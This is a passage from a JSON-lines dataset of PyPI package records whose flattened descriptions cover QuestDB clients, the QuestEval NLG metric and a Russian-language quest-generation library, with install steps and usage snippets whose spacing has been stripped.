full-connection\nencryption with TLS.QuickstartThe latest version of the library is 1.2.0.python3 -m pip install questdbfromquestdb.ingressimportSender,TimestampNanoswithSender('localhost',9009)assender:sender.row('sensors',symbols={'id':'toronto1'},columns={'temperature':20.0,'humidity':0.5},at=TimestampNanos.now())sender.flush()You can also send Pandas dataframes:importpandasaspdfromquestdb.ingressimportSenderdf=pd.DataFrame({'id':pd.Categorical(['toronto1','paris3']),'temperature':[20.0,21.0],'humidity':[0.5,0.6],'timestamp':pd.to_datetime(['2021-01-01','2021-01-02'])})withSender('localhost',9009)assender:sender.dataframe(df,table_name='sensors',at='timestamp')Docshttps://py-questdb-client.readthedocs.io/Codehttps://github.com/questdb/py-questdb-clientPackage on PyPIhttps://pypi.org/project/questdb/CommunityIf you need help, have additional questions or want to provide feedback, you\nmay find us onSlack.You can alsosign up to our mailing listto get notified of new releases.LicenseThe code is released under theApache License 2.0."} +{"package": "questdb-connect", "pacakge-description": "QuestDB ConnectThis repository contains the official implementation of QuestDB's dialect forSQLAlchemy,\nas well as an engine specification forApache Superset, usingpsycopg2for database connectivity.The Python module is available here:https://pypi.org/project/questdb-connect/Psycopg2is a widely used and trusted Python module for connecting to, and working with, QuestDB and other\nPostgreSQL databases.SQLAlchemyis a SQL toolkit and ORM library for Python. It provides a high-level API for communicating with\nrelational databases, including schema creation and modification. The ORM layer abstracts away the complexities\nof the database, allowing developers to work with Python objects instead of raw SQL statements.Apache Supersetis an open-source business intelligence web application that enables users to visualize and\nexplore data through customizable dashboards and reports. It provides a rich set of data visualizations, including\ncharts, tables, and maps.RequirementsPython from 3.9 to 3.11(superset itself use version3.9.x)Psycopg2('psycopg2-binary~=2.9.6')SQLAlchemy('SQLAlchemy<=1.4.47')You need to install these packages because questdb-connect depends on them.Versions 0.0.XThese are versions released for testing purposes.InstallationYou can install this package using pip:pipinstallquestdb-connectSQLALchemy Sample UsageUse the QuestDB dialect by specifying it in your SQLAlchemy connection string:questdb://admin:quest@localhost:8812/main\nquestdb://admin:quest@host.docker.internal:8812/mainFrom that point on use standard SQLAlchemy:importdatetimeimportosos.environ.setdefault('SQLALCHEMY_SILENCE_UBER_WARNING','1')importquestdb_connect.dialectasqdbcfromsqlalchemyimportColumn,MetaData,create_engine,insertfromsqlalchemy.ormimportdeclarative_baseBase=declarative_base(metadata=MetaData())classSignal(Base):__tablename__='signal'__table_args__=(qdbc.QDBTableEngine('signal','ts',qdbc.PartitionBy.HOUR,is_wal=True),)source=Column(qdbc.Symbol)value=Column(qdbc.Double)ts=Column(qdbc.Timestamp,primary_key=True)defmain():engine=create_engine('questdb://localhost:8812/main')try:Base.metadata.create_all(engine)withengine.connect()asconn:conn.execute(insert(Signal).values(source='coconut',value=16.88993244,ts=datetime.datetime.utcnow()))finally:ifengine:engine.dispose()if__name__=='__main__':main()Superset InstallationFollow the instructions availablehere.ContributingThis package is open-source, contributions are welcome. If you find a bug or would like to request a feature,\nplease open an issue on the GitHub repository. Have a look at the instructions fordevelopersif you would like to push a PR."} +{"package": "questdb-ilp-client", "pacakge-description": "Python QuestDB ILP TCP clientRequirementsThis repository contains a Python 3.9 API for ingesting data into QuestDB through the InfluxDB Line Protocol.We usemakeas a CLI to various convenient work developer flows.Install FlowWe requirePython 3.9.*, or aboveinstalled in your system, andpipneeds to be up-to-date:$python3--version\n$Python3.9.\n$pip3install--upgradepipNow we can install the project's dependencies in a virtual environment and activate it:$makeinstall-dependenciesOr for development (Required for code quality and test flows):$makeinstall-dependencies-devTo activate the environment:$poetryshell\n$echo$SHLVL2To deactivate the environment:$exit$echo$SHLVL1Code Quality Flow (Requires dev dependencies)For convenience, we can let standard tools apply standard code formatting; the second command will report\nissues that need to be addressed before using the client in production environments.$makeformat-code\n$makecheck-code-qualityTest Flow (Requires dev dependencies)To run all tests in thetestsmodule:$maketestStart/stop QuestDB Docker container FlowTo start QuestDB:$makecompose-upThis creates a folderquestdb_rootto store QuestDB's table data/metadata, server configuration files,\nand the web UI.The Web UI is avaliable at:localhost:9000.Logs can be followed on the terminal:$dockerlogs-fquestdbTo stop QuestDB:$makecompose-downData is available, even when QuestDB is down, in folderquestdb_root.Basic usagewithLineTcpSender(HOST,PORT,SIZE)asls:ls.table(\"metric_name\")ls.symbol(\"Symbol\",\"value\")ls.column_int(\"number\",10)ls.column_float(\"double\",12.23)ls.column_str(\"string\",\"born to shine\")ls.at_utc_datetime(datetime(2021,11,25,0,46,26))ls.flush()As an objectls=LineTcpSender(HOST,PORT,SIZE)ls.table(\"metric_name\")ls.symbol(\"Symbol\",\"value\")ls.column_int(\"number\",10)ls.column_float(\"double\",12.23)ls.column_str(\"string\",\"born to shine\")ls.at_utc_datetime(datetime(2021,11,25,0,46,26))ls.flush()Multi-line sendwithLineTcpSender(HOST,PORT,SIZE)asls:foriinrange(int(1e6)):ls.table(\"metric_name\")ls.column_int(\"counter\",i)ls.at_now()ls.flush()Object multi-line sendls=LineTcpSender(HOST,PORT,SIZE)foriinrange(int(1e6)):ls.table(\"metric_name\")ls.column_int(\"counter\",i)ls.at_now()ls.flush()NotesOn filesetup.py: It is deprecated. To publish a package on PyPi you\ncanfollow this."} +{"package": "quest-eras", "pacakge-description": "Sandia National Laboratories application suite for energy storage analysis and evaluation tools."} +{"package": "questeval", "pacakge-description": "QuestEvalQuestEval is aNLG metricto assess if two different inputs contain the same information. The metric, based on Question Generation and Answering can deal withmultimodalandmultilingualinputs.\nIt is the result from an (on-going) international collaboration, and so far it tackles various tasks:SummarizationText SimplificationData2textImage CaptioningMultilingual EvaluationPlanned extensions:Multilingual Evaluation1/ Installing QuestEval$ conda create --name questeval python=3.9\n$ conda activate questevalWARNING: You need to install, before any package, correct version ofpytorchlinked to your cuda version.(questeval) $ conda install pytorch cudatoolkit=10.1 -c pytorch(questeval) $ conda install pip\n(questeval) $ pip install -e .2/ Using QuestEvalThe defaulttaskistext2textand the defaultlanguageisen. It allows to measure the content similarity between any two English texts. This means thatQuestEval can be used to evaluate any NLG task where references are available. Alternatively, we can compare the hyothesis to the source as detailed below.For tasks specificities, see below.Here is an example. Note that the code can take time since it requires generating and answering a set of questions. However, if you let the parameteruse_cacheto its default value atTrue, running the same example again will be very fast this time.from questeval.questeval_metric import QuestEval\nquesteval = QuestEval(no_cuda=True)\n\nsource_1 = \"Since 2000, the recipient of the Kate Greenaway medal has also been presented with the Colin Mears award to the value of 35000.\"\nprediction_1 = \"Since 2000, the winner of the Kate Greenaway medal has also been given to the Colin Mears award of the Kate Greenaway medal.\"\nreferences_1 = [\n \"Since 2000, the recipient of the Kate Greenaway Medal will also receive the Colin Mears Awad which worth 5000 pounds\",\n \"Since 2000, the recipient of the Kate Greenaway Medal has also been given the Colin Mears Award.\"\n]\n\nsource_2 = \"He is also a member of another Jungiery boyband 183 Club.\"\nprediction_2 = \"He also has another Jungiery Boyband 183 club.\"\nreferences_2 = [\n \"He's also a member of another Jungiery boyband, 183 Club.\", \n \"He belonged to the Jungiery boyband 183 Club.\"\n]\n\nscore = questeval.corpus_questeval(\n hypothesis=[prediction_1, prediction_2], \n sources=[source_1, source_2],\n list_references=[references_1, references_2]\n)\n\nprint(score)Output:{'corpus_score': 0.6115364039438322, \n'ex_level_scores': [0.5698804143875364, 0.6531923935001279]}In the output, you have access to thecorpus_scorewhich corresponds to the average of each example score stored inex_level_scores. Note that the score is always between 0 and 1.Reference-less modeYes, QuestEval can score a text without any references:score = questeval.corpus_questeval(\n hypothesis=[prediction_1, prediction_2], \n sources=[source_1, source_2]\n)\n\nprint(score)Output:{'corpus_score': 0.5538727587335324, \n'ex_level_scores': [0.5382940950847808, 0.569451422382284]}LogsYou can have access to the logs containing all the information about the generated questions or the question answering outputs:log = questeval.open_log_from_text(source_1)For instance, to print the questions asked onsource_1:print(log['asked'].keys())Output:dict_keys(['Since 2000, the winner of the Kate Greenaway medal has also been given to the Colin Me', 'What medal has been given to the winner of the Colin Mears award?', 'What has been given to the Colin Mears award since 2000?', 'What has been given to the winner of the Colin Mears award since 2000?', 'What has been given to the winner of the Kate Greenaway medal since 2000?'])HashFor reproducibility purpose, we defined a hash that contains exhaustive information such as the QuestEval version, as well as the used models names and the scores types:questeval.__hash__()Output:\"QuestEval_version=0.2.4_task=text2text_lang=en_preproc=None_consist=False_scores=('answerability', 'bertscore', 'f1')W_hash=None_hyp_QA_hash=ThomasNLG/t5-qa_squad2neg-en_ref_QA_hash=ThomasNLG/t5-qa_squad2neg-en_src_QA_hash=ThomasNLG/t5-qa_squad2neg-en_hyp_QG_hash=ThomasNLG/t5-qg_squad1-en_ref_QG_hash=ThomasNLG/t5-qg_squad1-en_src_QG_hash=ThomasNLG/t5-qg_squad1-en\"Using your own modelsThe pre-trained QA/QG models will be automatically downloaded from Hugging Face. Alternatively, you can use your own models and change them dynamically with thequesteval.set_model(model_name)method that takes as input apathor a Hugging Facemodel_name. If themodel_nameis hosted on the Hugging Face hub, it will be downloaded automatically.\nYou can also use any of your beloved models, the only required method to implement is themodel.predict().3/ Tasks specificitiesSummarizationDescription:The project is a collaboration work betweenLIP6 Lab,New York UniversityandReciTAL Research.QuestEval also handles summarization specificities: we developed a Weighter that selects only the questions asking about the important facts that are worth to be summarized. Read more in the originalpaper. To activate this Weighterdo_weighter=Truewhen loading the metric. This parameter will be activated by default ifquesteval.task=summarization.Warning:the code has changed from the paper and Weigther input format is no longer correct. We plan to provide a new Weighter soon. However, in the meantime, if you plan to use it, we recommend to use the previousversion.Paper:QuestEval: Summarization Asks for Fact-based EvaluationHow to cite:@article{scialom2020QuestEval,\n title={QuestEval: Summarization Asks for Fact-based Evaluation},\n author={Scialom, Thomas and Dray, Paul-Alexis and Gallinari Patrick and Lamprier Sylvain and Piwowarski Benjamin and Staiano Jacopo and Wang Alex},\n journal={arXiv preprint arXiv:2103.12693},\n year={2021}\n}Text SimplificationDescription:For Text Simplification, we recommend to use the default setup with thetext2texttask.QuestEval has been shown to perform better than BLEU, BERTScore or SARI metrics as reported in the paper.Paper:Rethinking Automatic Evaluation in Sentence SimplificationHow to cite:@article{scialom2021rethinking,\n title={Rethinking Automatic Evaluation in Sentence Simplification},\n author={Scialom, Thomas and Martin, Louis and Staiano, Jacopo and de la Clergerie, {\\'E}ric Villemonte and Sagot, Beno{\\^\\i}t},\n journal={arXiv preprint arXiv:2104.07560},\n year={2021}\n}Data2textDescription:Trained data-QA/QG models that deals with input tables (e.g. E2E or Webnlg), are available by default. To load QuestEval fordata2texttasks, specifyquesteval.task=data2text.Note that you need a specific preprocessing to linearize the tables. By default we handle theGEMformat. If you need an other preprocessing for your format, you can pass a custom function to Questeval:src_preproc_pipe=custom_formating. Importantly, the linearised input format needs to be consistent with respect to our own format.Paper:Data-QuestEval: A Referenceless Metric for Data to Text Semantic EvaluationHow to cite:@article{rebuffel2021data,\n title={Data-QuestEval: A Referenceless Metric for Data to Text Semantic Evaluation},\n author={Rebuffel, Cl{\\'e}ment and Scialom, Thomas and Soulier, Laure and Piwowarski, Benjamin and Lamprier, Sylvain and Staiano, Jacopo and Scoutheeten, Geoffrey and Gallinari, Patrick},\n journal={arXiv preprint arXiv:2104.07555},\n year={2021}\n}Image Captioning[Coming Soon]Multilingual Evaluation[Coming Soon]"} +{"package": "questgame", "pacakge-description": "No description available on PyPI."} +{"package": "questgen", "pacakge-description": "\u0411\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u0434\u043b\u044f \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0437\u0430\u0434\u0430\u043d\u0438\u0439 (\u043a\u0432\u0435\u0441\u0442\u043e\u0432). \u041f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u044e \u043c\u0438\u0440\u0430 (\u0432 \u0432\u0438\u0434\u0435 \u043d\u0430\u0431\u043e\u0440\u0430 \u043f\u0440\u0435\u0434\u0438\u043a\u0430\u0442\u043e\u0432) \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u0432\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0435 \u043d\u0435\u043b\u0438\u043d\u0435\u0439\u043d\u044b\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0441 \u0441\u043e\u0431\u044b\u0442\u0438\u044f\u043c\u0438 \u0438 \u0440\u0430\u0437\u043d\u043e\u0433\u043e \u0440\u043e\u0434\u0430 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f\u043c\u0438 (\u0432\u0440\u043e\u0434\u0435 \u00ab\u0438\u0441\u0445\u043e\u0434 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043f\u0435\u0440\u0441\u043e\u043d\u0430\u0436\u0430 \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u00bb).\u0422\u0430\u043a\u0436\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0442\u043e, \u0447\u0442\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u043e\u0441\u044c, \u043f\u0440\u0438\u043c\u0435\u0440 \u0432\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438:svg\u041a\u043e\u043d\u0441\u0442\u0440\u0443\u043a\u0442\u043e\u0440\u044b \u0432\u0441\u0435\u0445 \u0437\u0430\u0434\u0430\u043d\u0438\u0439:./questgen/quests/\u0421\u043e\u0437\u0434\u0430\u0432\u0430\u043b\u0430\u0441\u044c \u0434\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432 MMOZPG \u0438\u0433\u0440\u0435\u0421\u043a\u0430\u0437\u043a\u0430.\u0412\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0432\u0441\u0435\u0445 \u00ab\u0431\u0430\u0437\u043e\u0432\u044b\u0445\u00bb \u0448\u0430\u0431\u043b\u043e\u043d\u043e\u0432 \u0437\u0430\u0434\u0430\u043d\u0438\u0439 \u043b\u0435\u0436\u0430\u0442 \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435./questgen/svgs/\u0420\u0430\u0431\u043e\u0442\u0430 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 \u043e\u043f\u0438\u0441\u0430\u043d\u0430 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435 \u043d\u0430habrahabr.\u0423\u0441\u043b\u043e\u0432\u043d\u044b\u0435 \u043e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u0432 \u0432\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0430\u0442\u043e\u0440\u0435\u041e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u0435\u0442\u0441\u044f \u0433\u0440\u0430\u0444 \u043a\u0432\u0435\u0441\u0442\u0430 \u0431\u0435\u0437 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0439 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0441\u043e \u0432\u0441\u0435\u043c\u0438 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u043c\u0438 \u0441\u043e\u0431\u044b\u0442\u0438\u044f, \u0441\u043c. \u0434\u0430\u043b\u0435\u0435).\u0441\u0435\u0440\u044b\u0435 \u0443\u0437\u043b\u044b \u2014 \u043d\u0430\u0447\u0430\u043b\u043e \u0438 \u043e\u043a\u043e\u043d\u0447\u0430\u043d\u0438\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f;\u0444\u0438\u043e\u043b\u0435\u0442\u043e\u0432\u044b\u0435 \u0443\u0437\u043b\u044b \u2014 \u0442\u043e\u0447\u043a\u0438 \u0432\u044b\u0431\u043e\u0440\u0430;\u0437\u0435\u043b\u0451\u043d\u044b\u0435 \u0443\u0437\u043b\u044b \u2014 \u043e\u0431\u044b\u0447\u043d\u044b\u0435 \u0442\u043e\u0447\u043a\u0438 \u0441\u044e\u0436\u0435\u0442\u0430;\u043a\u0440\u0430\u0441\u043d\u044b\u0435 \u0443\u0437\u043b\u044b \u2014 \u0443\u0441\u043b\u043e\u0432\u043d\u044b\u0435 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u044b;\u0431\u0438\u0440\u044e\u0437\u043e\u0432\u044b\u0435 \u043a\u043e\u043d\u0442\u0443\u0440\u044b \u2014 \u043f\u043e\u0434\u043a\u0432\u0435\u0441\u0442\u044b;\u0431\u043e\u043b\u0435\u0435 \u0442\u0451\u043c\u043d\u044b\u043c \u0444\u043e\u043d\u043e\u043c \u043d\u0430 \u0432 \u0443\u0437\u043b\u0430\u0445 \u043e\u0442\u043c\u0435\u0447\u0435\u043d\u044b \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f \u043a \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u043b\u0436\u043d\u044b \u0431\u044b\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u044b \u0434\u043b\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0430 \u0432 \u044d\u0442\u0443 \u0442\u043e\u0447\u043a\u0443 \u0441\u044e\u0436\u0435\u0442\u0430;\u0431\u043e\u043b\u0435\u0435 \u0441\u0432\u0435\u0442\u043b\u044b\u043c \u0444\u043e\u043d\u043e\u043c \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u044b \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u043b\u0436\u043d\u044b \u0431\u044b\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u044b \u0441\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0430 \u0432 \u0442\u043e\u0447\u043a\u0443 \u0441\u044e\u0436\u0435\u0442\u0430.\u0436\u0451\u043b\u0442\u044b\u0435 \u043a\u043e\u043d\u0442\u0443\u0440\u044b \u2014 \u0441\u043e\u0431\u044b\u0442\u0438\u044f;\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430pip install git+git://github.com/Tiendil/questgen.git#egg=Questgen\u041f\u0440\u0438\u043d\u0446\u0438\u043f \u0440\u0430\u0431\u043e\u0442\u044b\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044f \u043c\u0438\u0440\u0430 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0432\u0438\u0434\u0435 \u043f\u0440\u0435\u0434\u0438\u043a\u0430\u0442\u043e\u0432 \u0432\u0440\u043e\u0434\u0435LocatedIn(object='hero',place='place_1')\u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u044e\u0442\u0441\u044f \u0432 \u0431\u0430\u0437\u0443 \u0437\u043d\u0430\u043d\u0438\u0439 (\u0411\u0417)\u0417\u0430\u0434\u0430\u043d\u0438\u0435 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u043c \u0433\u0440\u0430\u0444\u043e\u043c \u0441 \u043e\u0434\u043d\u043e\u0439 \u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0439 \u0432\u0435\u0440\u0448\u0438\u043d\u043e\u0439 \u0438 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u043c\u0438 \u043a\u043e\u043d\u0435\u0447\u043d\u044b\u043c\u0438 (\u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0442\u043e\u0436\u0435 \u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f \u0432 \u0411\u0417).\u043a\u0430\u0436\u0434\u0430\u044f \u0432\u0435\u0440\u0448\u0438\u043d\u0430 \u0438\u043c\u0435\u0435\u0442 \u0441\u043f\u0438\u0441\u043e\u043a \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u043b\u0436\u043d\u044b \u0431\u044b\u0442\u044c \u0443\u0434\u043e\u0432\u043b\u0435\u0442\u0432\u043e\u0440\u0435\u043d\u044b, \u043f\u0440\u0435\u0436\u0434\u0435 \u0447\u0435\u043c \u043c\u043e\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u0432 \u043d\u0435\u0451 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0433\u0435\u0440\u043e\u0439 \u0434\u043e\u043b\u0436\u0435\u043d \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u044c\u0441\u044f \u0432 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u043c \u043c\u0435\u0441\u0442\u0435);\u043a\u0430\u0436\u0434\u0430\u044f \u0432\u0435\u0440\u0448\u0438\u043d\u0430 \u0438\u043c\u0435\u0435\u0442 \u0441\u043f\u0438\u0441\u043e\u043a \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u043b\u0436\u043d\u044b \u0431\u044b\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u044b, \u043a\u043e\u0433\u0434\u0430 \u043c\u044b \u0432 \u043d\u0435\u0451 \u043f\u0435\u0440\u0435\u0448\u043b\u0438;\u043a\u0430\u0436\u0434\u0430\u044f \u0434\u0443\u0433\u0430 \u0438\u043c\u0435\u0435\u0442 \u0434\u0432\u0430 \u0441\u043f\u0438\u0441\u043a\u0430 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439:\n* \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0434\u043e\u043b\u0436\u043d\u044b \u0431\u044b\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u044b, \u043a\u043e\u0433\u0434\u0430 \u043c\u044b \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u043c \u0434\u0432\u0438\u0433\u0430\u0442\u044c\u0441\u044f \u043f\u043e \u0434\u0443\u0433\u0435;\n* \u043a\u043e\u0433\u0434\u0430 \u043c\u044b \u0437\u0430\u043a\u0430\u043d\u0447\u0438\u0432\u0430\u0435\u043c \u0434\u0432\u0438\u0433\u0430\u0442\u044c\u0441\u044f \u043f\u043e \u0434\u0443\u0433\u0435 (\u0442.\u0435. \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u0432 \u043d\u043e\u0432\u0443\u044e \u0432\u0435\u0440\u0448\u0438\u043d\u0443 \u043f\u043e\u0441\u043b\u0435 \u0443\u0434\u043e\u0432\u043b\u0435\u0442\u0432\u043e\u0440\u0435\u043d\u0438\u044f \u0432\u0441\u0435\u0445 \u0435\u0451 \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u0439);\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0442\u0438\u043f\u043e\u0432 \u0432\u0435\u0440\u0448\u0438\u043d:\n* \u041d\u0430\u0447\u0430\u043b\u044c\u043d\u0430\u044f \u2014 \u043e\u0434\u043d\u0430 \u043d\u0430 \u0437\u0430\u0434\u0430\u043d\u0438\u0435, \u0441 \u043d\u0435\u0451 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u00ab\u043f\u0443\u0442\u0435\u0448\u0435\u0441\u0442\u0432\u0438\u0435\u00bb;\n* \u041a\u043e\u043d\u0435\u0447\u043d\u0430\u044f \u2014 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u0437\u0430\u0434\u0430\u043d\u0438\u0435, \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0435\u0442 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f (\u0434\u043b\u044f \u0441\u0442\u044b\u043a\u043e\u0432\u043a\u0438 \u0441 \u0434\u0440\u0443\u0433\u0438\u043c\u0438 \u0437\u0430\u0434\u0430\u043d\u0438\u044f\u043c\u0438);\n* \u043e\u0431\u044b\u0447\u043d\u0430\u044f \u2014 \u0443\u0437\u0435\u043b \u0438\u0441\u0442\u043e\u0440\u0438\u0438, \u043c\u043e\u0436\u0435\u0448\u044c \u0438\u043c\u0435\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0432\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u0434\u0443\u0433 \u0438 \u0440\u043e\u0432\u043d\u043e \u043e\u0434\u043d\u0443 \u0438\u0441\u0445\u043e\u0434\u044f\u0449\u0443\u044e;\n* \u0432\u044b\u0431\u043e\u0440 \u2014 \u043c\u043e\u0436\u0435\u0442 \u0438\u043c\u0435\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0438\u0441\u0445\u043e\u0434\u044f\u0449\u0438\u0445 \u0434\u0443\u0433, \u043c\u0435\u0436\u0434\u0443 \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u043a\u043b\u044e\u0447\u0430\u0442\u044c\u0441\u044f, \u043f\u043e\u043a\u0430 \u043d\u0435 \u043f\u0440\u0438\u0448\u043b\u0438 \u0432 \u043e\u0434\u043d\u0443 \u0438\u0437 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0432\u0435\u0440\u0448\u0438\u043d;\u041d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0432\u0435\u0440\u0448\u0438\u043d \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0435\u043d\u044b \u0432 \u00ab\u0441\u043e\u0431\u044b\u0442\u0438\u0435\u00bb, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0440\u0430\u0441\u043a\u0440\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u0440\u0438 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u0438 \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0433\u0440\u0430\u0444\u0430, \u0443\u0434\u0430\u043b\u044f\u044f \u0432\u0441\u0435 \u0432\u0435\u0440\u0448\u0438\u043d\u044b \u043a\u0440\u043e\u043c\u0435 \u043e\u0434\u043d\u043e\u0439. \u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u043c\u043e\u0436\u043d\u043e \u0434\u0435\u043b\u0430\u0442\u044c \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u044b\u0435 \u0441\u043e\u0431\u044b\u0442\u0438\u044f.\u041e\u0431\u0449\u0438\u0439 \u043f\u043e\u0440\u044f\u0434\u043e\u043a \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438:\u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043c\u0438\u0440\u0430;\u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0437\u0430\u0434\u0430\u043d\u0438\u0435;\u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0437\u0430\u0434\u0430\u043d\u0438\u0435 (\u0441\u043c. \u043f\u0440\u0438\u043c\u0435\u0440 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u0430\u043b\u0435\u0435);\u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u043d\u0430 \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0441\u0442\u044c;\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0441 \u043a\u0432\u0435\u0441\u0442\u043e\u043c \u0432 \u043a\u043e\u0434\u0435 \u0438\u0433\u0440\u044b (\u0438\u0433\u0440\u0430 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u043a\u043e\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u043f\u0440\u0438 \u043f\u0440\u043e\u0445\u043e\u0434\u0435 \u043f\u043e \u0433\u0440\u0430\u0444\u0443).\u0421\u043b\u0435\u0434\u0443\u0435\u0442 \u043f\u043e\u043c\u043d\u0438\u0442\u044c, \u0447\u0442\u043e 